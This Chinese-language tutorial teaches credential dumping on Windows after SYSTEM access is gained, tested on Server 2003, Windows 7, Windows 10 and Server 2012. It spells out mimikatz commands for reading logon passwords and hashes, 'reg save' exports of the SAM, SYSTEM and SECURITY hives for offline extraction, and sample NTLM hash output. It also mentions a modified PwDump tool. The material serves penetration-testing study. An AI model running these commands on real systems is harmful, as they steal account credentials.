Windows密码凭证获取学习(上)

简介: Windows密码凭证获取学习

1. 说明


本文参考了大量的第三方文档,参考资料如下,感谢各位师傅的帮助。

https://www.secrss.com/articles/24903
https://mp.weixin.qq.com/s/jW2tUXkiBaC6PiF-kRWb1Q
https://mp.weixin.qq.com/s/As4YZ8XDWCfBfieDUU30Ow
https://mp.weixin.qq.com/s/4nlyOIuyQZ9h0Bb5jQO4wQ
https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw
https://mp.weixin.qq.com/s/-pijbPocXG8bSDU-l4i4RA
https://zhuanlan.zhihu.com/p/57800688
https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw
https://xz.aliyun.com/t/10734#toc-2


2. Windows获取凭证或密码


一般来说,在我们获取到Windowssystem权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。

关于NTLM的知识,在这里就不在展开了,有兴趣的可以去搜下。


3. 环境准备


本次环境共准备了Windows server2003Windows7Windows10Windows server2012,按照他们的特点,有针对的进行实操获取。

本文默认已获取system权限的情况下进行操作。


4. 获取密码或hash方法


4.1 Mimikatz


这个神器肯定是大家都不陌生的, 以前我也写过关于这个工具的免杀学习文档。

原版工具:https://github.com/gentilkiwi/mimikatz

使用方法:

privilege::debug 
提升权限,返回Privilege '20' OK。说明权限提升成功
sekurlsa::logonpasswords
可以读取到NTLM哈希值


4.1.1 server2003


systeminfo查看当前的电脑是32位的,所以在这里就使用32位的来试下:


执行命令之后可以直接获取到明文:

privilege::debug 
sekurlsa::logonpasswords


4.1.2 windows10


在这里先关闭Windows10Windows defender,在这里并不对其进行免杀研究,直接使用x64位的之后,来获取hash

执行命令之后只能够获取hash,不能够直接获取明文:

209c6174da490caeb422f3fa5a7ae634

可以通过第三方的方式来获取密码:

当然,mimikatz也可以使用非交互的方式来获取hash

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"



4.2 注册表导出hash


有时候,因为某些问题,导致无法直接获取hash,所以在这里还可以使用注册表导出hash的方式来进行,具体的步骤如下:

在靶机上使用以下命令(需要system权限):

靶机上执行:
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
在本地使用mimikatz执行:
mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

4.2.1 server2003

打开cmd执行命令,导出system.hivsam.hivsecurity.hiv文件:

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

最后使用mimikatz执行,在非靶标机器上,不需要system权限:

mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

RID  : 000001f4 (500)
User : Administrator
  Hash LM  : f0d412bd764ffe81aad3b435b51404ee
  Hash NTLM: 209c6174da490caeb422f3fa5a7ae634

直接去查询即可。


4.2.2 Windows10


使用同样的方法导出之后再解密:

获取到hash信息:

User : admin
  Hash NTLM: 209c6174da490caeb422f3fa5a7ae634


4.3 pass64.exe


这个文件是我早些时候渗透的时候获得的,在win78等低于Windows10的系统上(这种说法不严谨),使用system权限运行能够直接获取64位系统的账号和密码信息。

这个工具应该是PwDump7工具的魔改版本。

win10上因为无法获取账号密码报错:

win7环境下:

相关文章
|
3月前
|
关系型数据库 MySQL 数据安全/隐私保护
windows mysql8 安装后 提示密码不对,修改下密码认证方式就可以了
windows mysql8 安装后 提示密码不对,修改下密码认证方式就可以了
584 3
|
3月前
|
Linux 数据安全/隐私保护 Windows
解决Windows密码丢失问题:详细指南
最近因为某些工作缘故,接触到windows比较频繁,特此记录一下 当下,计算机安全是每个人都不能忽视的重要问题。然而,有时可能因为忘记密码而无法访问自己的Windows系统,这会导致数据和信息的临时不可用。 本文将详细介绍两种场景下的密码恢复方法:一种是针对虚拟机,另一种适用于物理机。通过这些方法,可以快速恢复对系统的访问,确保业务的连续性。
解决Windows密码丢失问题:详细指南
|
2月前
|
安全 数据安全/隐私保护 Windows
Windows 允许空密码远程桌面
Windows 允许空密码远程桌面
35 2
|
4月前
|
Java 数据安全/隐私保护 Windows
ElasticSearch设置密码Windows
ElasticSearch设置密码Windows
116 0
|
4月前
|
Windows
逆向学习Windows篇:通过编写函数处理菜单消息
逆向学习Windows篇:通过编写函数处理菜单消息
27 0
|
4月前
|
安全 API C++
逆向学习Windows篇:C++中多线程的使用和回调函数的实现
逆向学习Windows篇:C++中多线程的使用和回调函数的实现
119 0
|
4月前
|
安全 API Windows
逆向学习Windows篇:文件操作详解
逆向学习Windows篇:文件操作详解
24 0
|
4月前
|
存储 数据安全/隐私保护 Windows
逆向学习Windows篇:进程句柄操作详解
逆向学习Windows篇:进程句柄操作详解
92 0
|
4月前
|
监控 安全 Windows
逆向学习Windows篇:lab的使用和生成过程,以及“dell”的导出函数和作用
逆向学习Windows篇:lab的使用和生成过程,以及“dell”的导出函数和作用
56 0
|
4月前
|
Windows
逆向学习Windows篇:动态加载与def导出
逆向学习Windows篇:动态加载与def导出
26 0
下一篇
无影云桌面